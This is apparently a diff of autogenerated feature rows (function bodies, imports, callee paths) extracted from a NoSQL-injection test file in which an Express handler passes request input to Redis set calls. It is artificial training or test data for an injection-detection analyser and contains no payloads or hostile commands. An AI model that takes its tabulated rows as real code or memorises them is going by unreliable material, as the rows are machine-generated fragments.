autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | 'arguments' object of anonymous function | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -4179,6 +20039,96 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | exceptional return of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | exceptional return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | return of anonymous function | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:53:1 | return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:30:37:32 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:35:37:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:35:37:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:35:37:37 | res | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:35:37:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:35:37:37 | res | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:13 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:13 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:13 | key | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:13 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:13 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key = req.body.key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key = req.body.key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key = req.body.key | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key = req.body.key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:11:38:28 | key = req.body.key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:19 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:19 | req | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:19 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:19 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:24 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:24 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:24 | req.body | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:24 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:24 | req.body | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:28 | req.body.key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:28 | req.body.key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:28 | req.body.key | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:28 | req.body.key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:17:38:28 | req.body.key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:21:38:24 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:21:38:24 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:21:38:24 | body | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:21:38:24 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:21:38:24 | body | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:26:38:28 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:26:38:28 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:26:38:28 | key | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:26:38:28 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:38:26:38:28 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:10 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:14 | client.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:14 | client.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:14 | client.set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:14 | client.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:14 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | exceptional return of client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:5:39:28 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:12:39:14 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:12:39:14 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:12:39:14 | set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:12:39:14 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:12:39:14 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:16:39:18 | key | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:16:39:18 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:16:39:18 | key | calleeImports | redis | @@ -4197,6 +20147,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:21:39:27 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:21:39:27 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:39:21:39:27 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:18 | setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:18 | setAsync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:18 | setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:18 | setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:18 | setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsyn ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsyn ... client) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsyn ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsyn ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsyn ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsync | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsync | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:11:41:55 | setAsync | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:30 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:30 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:30 | promisify | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:30 | promisify | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:30 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | exceptional return of promisi ... nt.set) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | exceptional return of promisi ... nt.set) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | exceptional return of promisi ... nt.set) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | exceptional return of promisi ... nt.set) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | exceptional return of promisi ... nt.set) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | promisi ... nt.set) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | promisi ... nt.set) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | promisi ... nt.set) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | promisi ... nt.set) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:42 | promisi ... nt.set) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:47 | promisi ... t).bind | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:47 | promisi ... t).bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:47 | promisi ... t).bind | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:47 | promisi ... t).bind | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:47 | promisi ... t).bind | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | exceptional return of promisi ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | exceptional return of promisi ... client) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | exceptional return of promisi ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | exceptional return of promisi ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | exceptional return of promisi ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | promisi ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | promisi ... client) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | promisi ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | promisi ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:22:41:55 | promisi ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:37 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:37 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:37 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:37 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:37 | client | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | CalleeFlexibleAccessPath | promisify | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | calleeImports | util | @@ -4205,6 +20205,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:32:41:41 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:39:41:41 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:39:41:41 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:39:41:41 | set | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:39:41:41 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:39:41:41 | set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:44:41:47 | bind | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:44:41:47 | bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:44:41:47 | bind | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:44:41:47 | bind | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:44:41:47 | bind | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | CalleeFlexibleAccessPath | promisify().bind | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | calleeImports | util | @@ -4213,6 +20223,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:41:49:41:54 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:14 | foo1 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:14 | foo1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:14 | foo1 | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:14 | foo1 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:14 | foo1 | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:39 | foo1 = ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:39 | foo1 = ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:39 | foo1 = ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:39 | foo1 = ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:11:43:39 | foo1 = ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:25 | setAsync | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:43:18:43:25 | setAsync | 